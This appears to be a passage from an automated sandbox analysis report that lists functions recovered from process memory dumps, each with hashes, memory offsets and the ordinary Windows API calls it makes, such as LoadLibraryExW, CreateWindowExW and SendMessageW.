            • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
            • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
            • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
            • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetCurrentProcess.KERNEL32 ref: 022DB730
            • GetCurrentThread.KERNEL32 ref: 022DB76D
            • GetCurrentProcess.KERNEL32 ref: 022DB7AA
            • GetCurrentThreadId.KERNEL32 ref: 022DB803
            Memory Dump Source
            • Source File: 0000000A.00000002.684132601.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
            Similarity
            • API ID: Current$ProcessThread
            • String ID:
            • API String ID: 2063062207-0
            • Opcode ID: b804133437e3ee91a49ce4971991fe4b6aa8c05ee1e107c2e50808cbbabd5161
            • Instruction ID: d9e9153895861c9584181485b11b92f2390cf5840782f6baa0618ff2c5706d2a
            • Opcode Fuzzy Hash: b804133437e3ee91a49ce4971991fe4b6aa8c05ee1e107c2e50808cbbabd5161
            • Instruction Fuzzy Hash: 6A5133B4E042498FEB14CFA9D698BDEBBF1BB48308F24856AE419A7360D7345844CF65
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetCurrentProcess.KERNEL32 ref: 022DB730
            • GetCurrentThread.KERNEL32 ref: 022DB76D
            • GetCurrentProcess.KERNEL32 ref: 022DB7AA
            • GetCurrentThreadId.KERNEL32 ref: 022DB803
            Memory Dump Source
            • Source File: 0000000A.00000002.684132601.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
            Similarity
            • API ID: Current$ProcessThread
            • String ID:
            • API String ID: 2063062207-0
            • Opcode ID: 15c848786a8bb54573ef388079395224fd00bd2808c0ab891e9e71aed72c9f80
            • Instruction ID: a47d9d335ddf540f481bb321163cf521710c0e41a09e6712f950782f15b600c4
            • Opcode Fuzzy Hash: 15c848786a8bb54573ef388079395224fd00bd2808c0ab891e9e71aed72c9f80
            • Instruction Fuzzy Hash: E55132B4E002498FEB14CFA9D598BDEFBF5BB88308F24856AE419A7360D7345844CB65
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 43149eb2c471f95c7caded1428d3148077e557be51c4f0490485b0a47d8bde8a
            • Instruction ID: dfe3a961d745ef0ca9ee526ddc28d9671133320e1b48e14bd2ec0940e62d1a99
            • Opcode Fuzzy Hash: 43149eb2c471f95c7caded1428d3148077e557be51c4f0490485b0a47d8bde8a
            • Instruction Fuzzy Hash: A1224F78E04306CFCB54DB98E588ABEFBB2BB89310F648555E91267355CB34A881CB71
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetModuleHandleW.KERNELBASE(00000000), ref: 022D962E
            Memory Dump Source
            • Source File: 0000000A.00000002.684132601.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
            Similarity
            • API ID: HandleModule
            • String ID:
            • API String ID: 4139908857-0
            • Opcode ID: 940af3ffbb211407d7586e8c2066e0c11a2c6028cf98fdb12182d7e3c979fd00
            • Instruction ID: ac4b8cfd0e30221326f3d5a821ce40c1b048bdbbd0d959a251dbfb8118771229
            • Opcode Fuzzy Hash: 940af3ffbb211407d7586e8c2066e0c11a2c6028cf98fdb12182d7e3c979fd00
            • Instruction Fuzzy Hash: 0C7137B4A10B058FDB24DF69D05079AB7F1BF88304F008A2DE58ADBA44DB74E845CF91
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 022DFD0A
            Memory Dump Source
            • Source File: 0000000A.00000002.684132601.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
            Similarity
            • API ID: CreateWindow
            • String ID:
            • API String ID: 716092398-0
            • Opcode ID: 009c6c97f2f0cab49137789846652a9a7c6ec8bc560bf22c3c30ca8475574e62
            • Instruction ID: 419ce94d81ca43b56e1396381c8a9bfa6f7cafd7dc67c0266bda05b129cf3aa1
            • Opcode Fuzzy Hash: 009c6c97f2f0cab49137789846652a9a7c6ec8bc560bf22c3c30ca8475574e62
            • Instruction Fuzzy Hash: 3751DDB1D10349DFDB14CFE9D980ADEBBB1BF48304F24862AE819AB214D7749885CF90
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 022DFD0A
            Memory Dump Source
            • Source File: 0000000A.00000002.684132601.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
            Similarity
            • API ID: CreateWindow
            • String ID:
            • API String ID: 716092398-0
            • Opcode ID: a9c542a7dca61cbf246c2a94dde2308c73acffdfde1fc5013b0695509a1d2c99
            • Instruction ID: b5bc0bff56a56ff7c837f8ad20b060028c87a0310e6cbcf0e0b49e82ef337134
            • Opcode Fuzzy Hash: a9c542a7dca61cbf246c2a94dde2308c73acffdfde1fc5013b0695509a1d2c99
            • Instruction Fuzzy Hash: AA41EFB1D10349DFDB14CFE9C980ADEBBB5BF48304F24822AE819AB214D7749845CF90
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateActCtxA.KERNEL32(?), ref: 050D46B1
            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID: Create
            • String ID:
            • API String ID: 2289755597-0
            • Opcode ID: 3859fdbd0fbb5bcc96f565327d18bb01bd56fa8395316883c43cab48ad661b5b
            • Instruction ID: 1b66262cac507e5c8e295b3cbdc3fa5c3fdfccc6ffdfdd84a9f1ad75ab4ea48e
            • Opcode Fuzzy Hash: 3859fdbd0fbb5bcc96f565327d18bb01bd56fa8395316883c43cab48ad661b5b
            • Instruction Fuzzy Hash: E0411FB1C04758CFDB20CFA9D884BDEBBB1BF59304F24806AD409AB251D7B56946CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateActCtxA.KERNEL32(?), ref: 050D46B1
            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID: Create
            • String ID:
            • API String ID: 2289755597-0
            • Opcode ID: 424b1d947505ad5e9946f66e50257fd0ab6119f1c0b24e7b123d579e38b64647
            • Instruction ID: 3e0b90f340ead9830c8c4edf16ae03b9adf73339e78761aed8e070097e86d36f
            • Opcode Fuzzy Hash: 424b1d947505ad5e9946f66e50257fd0ab6119f1c0b24e7b123d579e38b64647
            • Instruction Fuzzy Hash: 244101B0C04758CBDB24DFA9D884BDEFBB5BF89304F20806AD409AB251D7B56945CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CallWindowProcW.USER32(?,?,?,?,?), ref: 050D2531
            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID: CallProcWindow
            • String ID:
            • API String ID: 2714655100-0
            • Opcode ID: 025f59c1b5dcf068a595078bc52ff3075d9230adf29e7a61aa63db979f30aa89
            • Instruction ID: e16591691a35ba973cec1ac06941195f8239f21b4f36d3476b3e0b87cdea5a2e
            • Opcode Fuzzy Hash: 025f59c1b5dcf068a595078bc52ff3075d9230adf29e7a61aa63db979f30aa89
            • Instruction Fuzzy Hash: AF41F9B8A003058FDB14CF99D448BAEFBF6FB88314F25C559D519AB325D374A841CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 050DB957
            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID: CreateFromIconResource
            • String ID:
            • API String ID: 3668623891-0
            • Opcode ID: 195db2f00505452a3b9f6aa684fcc968f2a6c7f7d6e2090834230195f487d558
            • Instruction ID: 98628c60174fc99956d72be63d3ae7a908edf009052f26f273c0090fb6c0056b
            • Opcode Fuzzy Hash: 195db2f00505452a3b9f6aa684fcc968f2a6c7f7d6e2090834230195f487d558
            • Instruction Fuzzy Hash: 67318B729043899FDB118FA9D840BDEBFF8EF19310F09806AE954AB252C3359851DFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • FindCloseChangeNotification.KERNELBASE(?), ref: 05266320
            Memory Dump Source
            • Source File: 0000000A.00000002.687458863.0000000005260000.00000040.00000001.sdmp, Offset: 05260000, based on PE: false
            Similarity
            • API ID: ChangeCloseFindNotification
            • String ID:
            • API String ID: 2591292051-0
            • Opcode ID: 7fea69cf0189383655a0e8a2ae2d1b875fcef6c603e1da221a5e33c469011946
            • Instruction ID: 76175d83cbaa866a55cd04fb518a143e94d3df1476bccc84e85c4cd1b50980b3
            • Opcode Fuzzy Hash: 7fea69cf0189383655a0e8a2ae2d1b875fcef6c603e1da221a5e33c469011946
            • Instruction Fuzzy Hash: 2731B8B1900308CFCB10DF98D884BDEBBF4FF58310F14806AE858AB251C335A985CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 022DBD87
            Memory Dump Source
            • Source File: 0000000A.00000002.684132601.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
            Similarity
            • API ID: DuplicateHandle
            • String ID:
            • API String ID: 3793708945-0
            • Opcode ID: 1dc08d326a60123936cbfbeb478d7bd1357448dba5f5263bb84b3c03ba342b1d
            • Instruction ID: 9bc712b18b06a7cac490c1ca8a2b156f2a7b67c0c0370de072528ab3b05a96d1
            • Opcode Fuzzy Hash: 1dc08d326a60123936cbfbeb478d7bd1357448dba5f5263bb84b3c03ba342b1d
            • Instruction Fuzzy Hash: 0821BFB5D002499FDB10CFA9D984BDEBBF4EB48314F14852AE918A7310D378A955CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 022DBD87
            Memory Dump Source
            • Source File: 0000000A.00000002.684132601.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
            Similarity
            • API ID: DuplicateHandle
            • String ID:
            • API String ID: 3793708945-0
            • Opcode ID: d81deea3438995c3358a1b7d24e4b8b6a47415c174b0aca2fb594b36ed4308e7
            • Instruction ID: 45b6bbee306344b9b56e9d676dc88a3997bdff2ab866457308f15134823ce742
            • Opcode Fuzzy Hash: d81deea3438995c3358a1b7d24e4b8b6a47415c174b0aca2fb594b36ed4308e7
            • Instruction Fuzzy Hash: 6521C4B59002499FDB10CFAAD884ADEFFF8FB48314F14852AE914A7310D378A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,022D96A9,00000800,00000000,00000000), ref: 022D98BA
            Memory Dump Source
            • Source File: 0000000A.00000002.684132601.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 337af8b5a1ebe9cf023c1474812cc9ac789b710e4bb8cdd24b5466c24a8729a5
            • Instruction ID: 752badec1790444491ec47e51f1353275d3580bc7a7a686f98ef34a4763a1456
            • Opcode Fuzzy Hash: 337af8b5a1ebe9cf023c1474812cc9ac789b710e4bb8cdd24b5466c24a8729a5
            • Instruction Fuzzy Hash: C51130B6D002499FDB10CF9AC844BDEFBF4EB88714F10842EE919A7600C375A945CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 050DB957
            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID: CreateFromIconResource
            • String ID:
            • API String ID: 3668623891-0
            • Opcode ID: 62ff3404e6b1069a6cc16247fbca5e29c01ab80c0024480421ca58445374f896
            • Instruction ID: 78aaa72baabe99413d80311a6824155d15cd8a77297690460604144bcf42b371
            • Opcode Fuzzy Hash: 62ff3404e6b1069a6cc16247fbca5e29c01ab80c0024480421ca58445374f896
            • Instruction Fuzzy Hash: B41134B58003499FDB10CFAAD844BDEFFF8EB48320F14841AE914A7210C339A954DFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,022D96A9,00000800,00000000,00000000), ref: 022D98BA
            Memory Dump Source
            • Source File: 0000000A.00000002.684132601.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 68666be0f161b669f24b7c68fbd33b79e950506352de2c84142ba4a5b76f44ab
            • Instruction ID: a1797319aba9e8baac08c7258499732fba80e20417211c6c7b99b7fbbaf0a761
            • Opcode Fuzzy Hash: 68666be0f161b669f24b7c68fbd33b79e950506352de2c84142ba4a5b76f44ab
            • Instruction Fuzzy Hash: 6911D0B6D002498FDB10CF99D584BDEFBF4AF48314F14852AE819A7600C375A945CFA5
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 022D7F5D
            Memory Dump Source
            • Source File: 0000000A.00000002.684132601.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
            Similarity
            • API ID: CallbackDispatcherUser
            • String ID:
            • API String ID: 2492992576-0
            • Opcode ID: f6554cf951f9163542d664ef772068cff3b0265244fcd0589e4d31635869a0b7
            • Instruction ID: 087833eeef5737ff24a63a5a223b29b56574908ed6b7c977b4b5fed63da3cd3b
            • Opcode Fuzzy Hash: f6554cf951f9163542d664ef772068cff3b0265244fcd0589e4d31635869a0b7
            • Instruction Fuzzy Hash: 2B21CAB0C043848FDB10CFA8E4487EEBFF4AB05304F44846AE584A3642C3789A15CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • PostMessageW.USER32(?,022A53E8,00000000,?), ref: 050DE73D
            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: d936a749860856a090a85580ea816e695c907cf8fcf98122f1ea923742343938
            • Instruction ID: 5cb66e823792c90822d0866318bb4da2836bb3f063804f2ec978c495f0ea2230
            • Opcode Fuzzy Hash: d936a749860856a090a85580ea816e695c907cf8fcf98122f1ea923742343938
            • Instruction Fuzzy Hash: D01125B58003499FDB50CF99D885BEEFBF8FB48320F10842AE954A7640D378A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • PostMessageW.USER32(?,022A53E8,00000000,?), ref: 050DE73D
            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: f1475a430bfba0f87383e34ecb214b0e9d396629a405a35a5c739cae6aa34866
            • Instruction ID: 7b4fca8596ca9965602a762b8a5a6e3bbbf679ac87b54bef435e97823e648f9b
            • Opcode Fuzzy Hash: f1475a430bfba0f87383e34ecb214b0e9d396629a405a35a5c739cae6aa34866
            • Instruction Fuzzy Hash: 301132B58003099FDB50CF99D885BEEFBF8FB48320F10842AE854A7201D378A944CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • FindCloseChangeNotification.KERNELBASE(?), ref: 05266320
            Memory Dump Source
            • Source File: 0000000A.00000002.687458863.0000000005260000.00000040.00000001.sdmp, Offset: 05260000, based on PE: false
            Similarity
            • API ID: ChangeCloseFindNotification
            • String ID:
            • API String ID: 2591292051-0
            • Opcode ID: 0f62764a6ae4fbc5bcb3889a37b383692ca4bdd02ee04eb0422476ed5ced4dac
            • Instruction ID: 39c8972142cb548c04f154a5ce7009b479fa17eef962827d29f1eb6052999275
            • Opcode Fuzzy Hash: 0f62764a6ae4fbc5bcb3889a37b383692ca4bdd02ee04eb0422476ed5ced4dac
            • Instruction Fuzzy Hash: 2D1103B58042498FDB20CF99D484BDEBBF4EF58324F14852AD959A7740D378A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetModuleHandleW.KERNELBASE(00000000), ref: 022D962E
            Memory Dump Source
            • Source File: 0000000A.00000002.684132601.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
            Similarity
            • API ID: HandleModule
            • String ID:
            • API String ID: 4139908857-0
            • Opcode ID: 51915d459e09f4f6ab3aa9cd1ca092605edc9492647df46d3c8f74b9eb70cb7a
            • Instruction ID: aaa561c8eba1e2fd610dbe775dafea26d97ec24b6ee11550f1b5aacda74ec1ff
            • Opcode Fuzzy Hash: 51915d459e09f4f6ab3aa9cd1ca092605edc9492647df46d3c8f74b9eb70cb7a
            • Instruction Fuzzy Hash: AC11E0B5D002498FDB10CF9AD844BDEFBF4EB89214F14852AD829B7600C375A545CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000), ref: 050DBCBD
            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: a28d5e2554a6d5f86a82fbabeef6632d9023c888b059386967aafc3e9552eb19
            • Instruction ID: b1ce9dd059debed67293c3ab38064077a71aeae4fca13e67456d6ceddcb76ca2
            • Opcode Fuzzy Hash: a28d5e2554a6d5f86a82fbabeef6632d9023c888b059386967aafc3e9552eb19
            • Instruction Fuzzy Hash: F611B0B59043499FDB10CF99D889BDEFBF8FB48314F10852AE955A7600C375A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,050D226A,?,00000000,?), ref: 050DC435
            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: e05bc56ebd3c820dde6bf6ffef037d7868581579c409f0088203377f4acb1a42
            • Instruction ID: b5a2f984a753704a9abc821145771307cfd3f66d9bbf31f85b1581f94df7cd5b
            • Opcode Fuzzy Hash: e05bc56ebd3c820dde6bf6ffef037d7868581579c409f0088203377f4acb1a42
            • Instruction Fuzzy Hash: A51103B59043499FDB20CF99D884BEEFBF8FB59314F10852AE915A7600C3B4A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • PostMessageW.USER32(?,00000018,00000001,?), ref: 050DD29D
            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: e9bde06da63fabdde85400131feaddaa27b19677c1112c3b966fac6f188d183c
            • Instruction ID: 29140a049b4f67b32ceeb1fff607caa343ba9714ca2e2764595564c3d8eb0f2c
            • Opcode Fuzzy Hash: e9bde06da63fabdde85400131feaddaa27b19677c1112c3b966fac6f188d183c
            • Instruction Fuzzy Hash: 8D11C2B59043499FDB10CF99D885BEEFBF8EB58314F10852AE915A7600C375A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • PostMessageW.USER32(?,00000018,00000001,?), ref: 050DD29D
            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: 79151545fd59ec6ed4639c4474dfb7f341b0ea1ebbab466090afe8efd8ab0538
            • Instruction ID: 009effdc36cbd2f026f22bb6fd81ffdfa25c2bdcfb2c3a7ebe1db397950d22d1
            • Opcode Fuzzy Hash: 79151545fd59ec6ed4639c4474dfb7f341b0ea1ebbab466090afe8efd8ab0538
            • Instruction Fuzzy Hash: 7511E0B58003499FEB10CF99D885BEEFBF8FB58320F10851AE814A7600C378A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 0000000A.00000002.687458863.0000000005260000.00000040.00000001.sdmp, Offset: 05260000, based on PE: false
            Similarity
            • API ID: DispatchMessage
            • String ID:
            • API String ID: 2061451462-0
            • Opcode ID: 61bda13346ef21a4f095410be6609ca42a167982f0c13f4ec6fe9b17ff403840
            • Instruction ID: e7159ab775bbbb5730ab96a06a2161fdd414bdca83e9d276db0e6841fef5f122
            • Opcode Fuzzy Hash: 61bda13346ef21a4f095410be6609ca42a167982f0c13f4ec6fe9b17ff403840
            • Instruction Fuzzy Hash: B111E3B5C046498FDB10CF9AD444BDEFBF4AB48314F14852AD919A7600C378A545CFA5
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,050D226A,?,00000000,?), ref: 050DC435
            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: d3ae5bf58f02629be7b9e9b341d2e4b178a41a78c6f0277c890f231c1402b389
            • Instruction ID: c1204dd69c1324c28c72de89986cbce941fe9e0c042fff9b337eb2854befa2f2
            • Opcode Fuzzy Hash: d3ae5bf58f02629be7b9e9b341d2e4b178a41a78c6f0277c890f231c1402b389
            • Instruction Fuzzy Hash: 9711F2B58003499FEB10CF99D885BEEFBF8FB48314F10852AE854A7600C374A945CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SetWindowLongW.USER32(?,?,?), ref: 022DFE9D
            Memory Dump Source
            • Source File: 0000000A.00000002.684132601.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
            Similarity
            • API ID: LongWindow
            • String ID:
            • API String ID: 1378638983-0
            • Opcode ID: 57c5770f446c38cc92bc5e07abe38b57bd11d5ec0452b20b9e49a0d566f4e7f2
            • Instruction ID: 27705a6cdad2f9b1bd3633e6dc648ebe6fd37d99371a950a132c8ebcd7c03a4b
            • Opcode Fuzzy Hash: 57c5770f446c38cc92bc5e07abe38b57bd11d5ec0452b20b9e49a0d566f4e7f2
            • Instruction Fuzzy Hash: 2C11FEB5900249CFDB10CF99D685BDEBBF8EB48324F14855AE919A7701C374A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SetWindowLongW.USER32(?,?,?), ref: 022DFE9D
            Memory Dump Source
            • Source File: 0000000A.00000002.684132601.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
            Similarity
            • API ID: LongWindow
            • String ID:
            • API String ID: 1378638983-0
            • Opcode ID: 477c69179ec238a2e9e9d8132f8ba8b7f819c3c0115287bbe8755e6a5bb84d67
            • Instruction ID: 4f2a80a0ce0c74a49ec50856915d1d03fd7dda9aecb2c2fd8621e4ac5ac6230d
            • Opcode Fuzzy Hash: 477c69179ec238a2e9e9d8132f8ba8b7f819c3c0115287bbe8755e6a5bb84d67
            • Instruction Fuzzy Hash: EF1112B59002498FDB10CF99D984BDFFBF8EB48324F10851AE819A7701C374A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 0000000A.00000002.687458863.0000000005260000.00000040.00000001.sdmp, Offset: 05260000, based on PE: false
            Similarity
            • API ID: DispatchMessage
            • String ID:
            • API String ID: 2061451462-0
            • Opcode ID: 0fc6977898b4c294cf99ae65b92caaf81164343626425bac321346350e98af5e
            • Instruction ID: 4621c3e049bd05000faa3377186b0e79b88b646048a4299b7cf2be8be230dea7
            • Opcode Fuzzy Hash: 0fc6977898b4c294cf99ae65b92caaf81164343626425bac321346350e98af5e
            • Instruction Fuzzy Hash: 2B11D0B5D046498FDB20CF9AD848BDEFBF4FB48314F10852AE819A7600D378A545CFA5
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000), ref: 050DBCBD
            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: e3f8550c2a0bb4488e444a6754f9b8307715f33fde19029dda40ae53d325f511
            • Instruction ID: 2734ddc56de03a1eaacd9877e704420e8653ea49cafa6fc0e3786c2e7a477b45
            • Opcode Fuzzy Hash: e3f8550c2a0bb4488e444a6754f9b8307715f33fde19029dda40ae53d325f511
            • Instruction Fuzzy Hash: 061100B98003498FDB10CF99D885BDEFBF8FB48320F10882AE818A7600C374A544CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 0000000A.00000002.683919210.0000000000A4D000.00000040.00000001.sdmp, Offset: 00A4D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4cd168af5382a5f3b79a4005a7cb978bb665a625fff909facd1de11e375a819a
            • Instruction ID: 4e6cd1db5c62a66db082174dd0bd63ccd1666705beebe1e414c5fb5947d5310b
            • Opcode Fuzzy Hash: 4cd168af5382a5f3b79a4005a7cb978bb665a625fff909facd1de11e375a819a
            • Instruction Fuzzy Hash: A02103B5604240DFDB01DF10D8C0F26BF65FBC8328F24C569E9054B206C736D816CBA2
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 0000000A.00000002.683919210.0000000000A4D000.00000040.00000001.sdmp, Offset: 00A4D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 09e181571646fab02b154b36c8d3c70b51798e13813ff58a2571621cc130eae6
            • Instruction ID: d2ca6ed1b6440d7f5080a4583c1daaff20e65f8a9fd8ee4dd77e8c4d959c8f29
            • Opcode Fuzzy Hash: 09e181571646fab02b154b36c8d3c70b51798e13813ff58a2571621cc130eae6
            • Instruction Fuzzy Hash: 3B21FFB9608240DFDB01CF10D8C0F26BFA5FBD8324F258569E9094B20AC336D856CAA2
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 0000000A.00000002.683939568.0000000000A5D000.00000040.00000001.sdmp, Offset: 00A5D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 381067b71ab18ab4fcfede9e131d770658490e5e24dd37ee4f5f86089a5567f2
            • Instruction ID: 04576ac74910b4bc42bee346c726ae7574bc732105acf5ab3e2bb11b82580b23
            • Opcode Fuzzy Hash: 381067b71ab18ab4fcfede9e131d770658490e5e24dd37ee4f5f86089a5567f2
            • Instruction Fuzzy Hash: D021F2B0604240EFDB21CF50D9C0B6ABBA5FB84315F24CA6DED094B246C376D84ACA61
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 0000000A.00000002.683939568.0000000000A5D000.00000040.00000001.sdmp, Offset: 00A5D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d01c81b841efe660029345fff8d8486fee43bc18630c8cd5ef261f9cf3574fbe
            • Instruction ID: 812714ad889eaf552500a354d2ec0f64425522f36ade3a39716da490b8c8e97a
            • Opcode Fuzzy Hash: d01c81b841efe660029345fff8d8486fee43bc18630c8cd5ef261f9cf3574fbe
            • Instruction Fuzzy Hash: F921D775604244DFDB24DF14D4C4B16BB65FB84315F34C569DD4A4B286C33AD84BCB61
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 0000000A.00000002.683939568.0000000000A5D000.00000040.00000001.sdmp, Offset: 00A5D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b7b08944f4130ee9e850c3dbd9a7e49a038f714d4d17a9321dd3843d68d52ee7
            • Instruction ID: 13d16721fd3f24b418c7888ccfacf4f21d0b359d47de42b1cba6986dad3f267a
            • Opcode Fuzzy Hash: b7b08944f4130ee9e850c3dbd9a7e49a038f714d4d17a9321dd3843d68d52ee7
            • Instruction Fuzzy Hash: F4215E755093C08FDB12CF20D994B15BF71FB46314F28C6EAD8498B697C33A980ACB62
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 0000000A.00000002.683919210.0000000000A4D000.00000040.00000001.sdmp, Offset: 00A4D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2d1ced6dc2e75453a2601a127eb843bfa51fca63bdaac9e78988749db0cf302c
            • Instruction ID: 00445a8c0758d4e0d59564b2606d71bbe85c0c041a61742c8880607e0fa90ca6
            • Opcode Fuzzy Hash: 2d1ced6dc2e75453a2601a127eb843bfa51fca63bdaac9e78988749db0cf302c
            • Instruction Fuzzy Hash: 63117C76504280DFCF16CF14D9C4B16FF62FB98324F25C6A9D8094B656C33AD85ACBA2
            Uniqueness

            Uniqueness Score: -1.00%
